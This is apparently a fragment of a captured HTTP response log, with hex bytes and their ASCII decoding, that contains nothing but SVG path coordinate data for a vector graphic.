                                                                                                                                                                              2023-09-15 05:27:48 UTC4707INData Raw: 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c
                                                                                                                                                                              Data Ascii: 7-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4723INData Raw: 2d 34 22 20 64 3d 22 4d 38 33 33 2e 35 36 2c 31 39 37 2e 36 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c
                                                                                                                                                                              Data Ascii: -4" d="M833.56,197.63a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4739INData Raw: 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 31 36 2e 34 34 2c 33 30 37 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32
                                                                                                                                                                              Data Ascii: ></path><path class="cls-4" d="M816.44,307.58a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2
                                                                                                                                                                              2023-09-15 05:27:48 UTC4755INData Raw: 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 35 2e 39 32 2c 32 32 36 2e 35 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c
                                                                                                                                                                              Data Ascii: 8,0,0,1-.15-2.81"></path><path class="cls-4" d="M785.92,226.58a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,
                                                                                                                                                                              2023-09-15 05:27:48 UTC4771INData Raw: 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22
                                                                                                                                                                              Data Ascii: 81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"
                                                                                                                                                                              2023-09-15 05:27:48 UTC4787INData Raw: 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 38 34 2c 31 35 38 2e 34 37 41 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 35 34 31 2c 31 36 31 61 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e
                                                                                                                                                                              Data Ascii: 18,3.18"></path><path class="cls-7" d="M541.84,158.47A1.92,1.92,0,0,1,541,161a2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.
                                                                                                                                                                              2023-09-15 05:27:48 UTC4803INData Raw: 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36
                                                                                                                                                                              Data Ascii: ,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36
                                                                                                                                                                              2023-09-15 05:27:48 UTC4819INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 34 36 2c 31 34 38 2e 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32
                                                                                                                                                                              Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M596.46,148.9a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2
                                                                                                                                                                              2023-09-15 05:27:48 UTC4835INData Raw: 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e
                                                                                                                                                                              Data Ascii: 79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17">
                                                                                                                                                                              2023-09-15 05:27:48 UTC4851INData Raw: 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 31 2e 30 37 2c 31 33 39 2e 33 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 0,1,.17,3.18"></path><path class="cls-7" d="M651.07,139.33a1.91,1.91,0,0,1-.86,2.48,2.8,2.8,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8
                                                                                                                                                                              2023-09-15 05:27:48 UTC4867INData Raw: 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                              Data Ascii: 9,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.
                                                                                                                                                                              2023-09-15 05:27:48 UTC4883INData Raw: 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 36 39 2c 31 32 39 2e 37 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30
                                                                                                                                                                              Data Ascii: ,3.18"></path><path class="cls-7" d="M705.69,129.75a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0
                                                                                                                                                                              2023-09-15 05:27:48 UTC4899INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                              Data Ascii: 69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.34,2.34,0,0,1,.17,3.17"></path><path class="cls-7" d="M740.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path cla
                                                                                                                                                                              2023-09-15 05:27:48 UTC4915INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 33 31 2c 31 32 30 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30
                                                                                                                                                                              Data Ascii: lass="cls-7" d="M760.31,120.18a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0
                                                                                                                                                                              2023-09-15 05:27:48 UTC4931INData Raw: 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: .12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                              2023-09-15 05:27:48 UTC4947INData Raw: 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 30 35 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 39 32 2c 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22
                                                                                                                                                                              Data Ascii: 3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,.05,3.58"></path><path class="cls-9" d="M688.92,233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9"
                                                                                                                                                                              2023-09-15 05:27:48 UTC4963INData Raw: 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 33 32 39 2e 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                              Data Ascii: 2.63,0,0,1,0,3.57"></path><path class="cls-9" d="M723.35,329.6a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,
